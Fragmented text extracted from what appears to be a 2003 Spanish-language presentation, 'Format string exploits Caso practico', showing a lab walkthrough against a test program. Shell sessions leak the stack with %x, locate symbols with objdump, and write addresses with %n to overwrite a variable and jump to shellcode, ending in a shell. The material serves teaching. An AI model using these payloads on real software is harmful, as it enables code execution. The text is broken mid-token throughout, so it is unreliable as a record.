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981-40B2-4B69-9B8F-3CC2A3A9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7FE-A0B6-4477-AD6F-48103BF6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775-7E2A-4BD2-B46F-AA072EBC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D50-DD41-473E-8A9C-8ADC9AE6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8D0-E993-49B9-A8E3-DBFF2A35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2D1-98FB-42E7-9E2E-023D8330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D94-A91B-44D9-B129-0FAACFEE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EB8-D1B1-489A-B5F7-2361CF73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132-A495-4715-86D3-9E00442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625-AB70-430A-95E9-799FD2A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09D-8B20-46A3-851C-CB4F114B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BDB-6EFB-4ED9-94FA-A3582AB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0C97-6104-4040-8F67-6A0A0B88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o pra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a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955800"/>
          <a:ext cx="861048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55800"/>
                    <a:ext cx="861048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ido de la pi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$(perl -e 'print "%x."x40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808f121.bffff6d8.804864c.0.20415.bffff7c8.804828a.bffff6f0.0.79.80a41c0.80a41c0.c.79.78.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e78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%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.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808f121.bffff728.804864c.0.20415.bffff818.804828a.bffff740.0.34.80a41c0.80a41c0.c.34.33.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objdump -D fs1 | grep '&lt;num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80a3074 &lt;num&gt;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c80a41c080a41c0c2c2b41414141.80a30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%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b80a41c080a41c0c2b2a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AAAA$'\x74\x30\x0a\x08'AAAA$'\x74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4\x30\x0a\x08'%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%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718804864c020415bffff808804828abffff73004380a41c080a41c0c4342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234/5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f/15    Pad2: 0xde/222  Pad3: 0xde/222  Pad4: 0xde/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milio@vega fstring]$ ./fs1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$'\x74\x30\x0a\x08'AAAA$'\x75\x30\x0a\x08'AAAA$'\x76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7\x30\x0a\x08'%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%15u%n%222u%n%222u%n%222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u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v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w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6f8804864c020415bffff7e8804828abffff71005a80a41c080a41c0c5a59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7627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objdump -D fs1 | grep shell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80a3040 &lt;shellcode&gt;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40:       eb 24                   jmp    80a3066 &lt;shellcode+0x26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66:       e8 d7 ff ff ff          call   80a3042 &lt;shellcode+0x2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0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30a/7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d7/215  Pad2: 0xf0/240  Pad3: 0xda/218  Pad4: 0xfe/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fc\xf6\xff\xbf'AAAA$'\xfd\xf6\xff\xbf'AAAA$'\xfe\xf6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ff\xf6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ec\xf7\xff\xbf'AAAA$'\xed\xf7\xff\xbf'AAAA$'\xee\xf7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ef\xf7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-2.05b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1:38:50Z</dcterms:created>
  <dc:creator>Emilio Mira Alfaro</dc:creator>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy>santi</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2003-07-31T13:02:14Z</dcterms:modified>
  <cp:revision>2</cp:revision>
  <dc:subject/>
  <dc:title>Format string exploits Caso practico</dc:title>
</cp:coreProperties>
</file>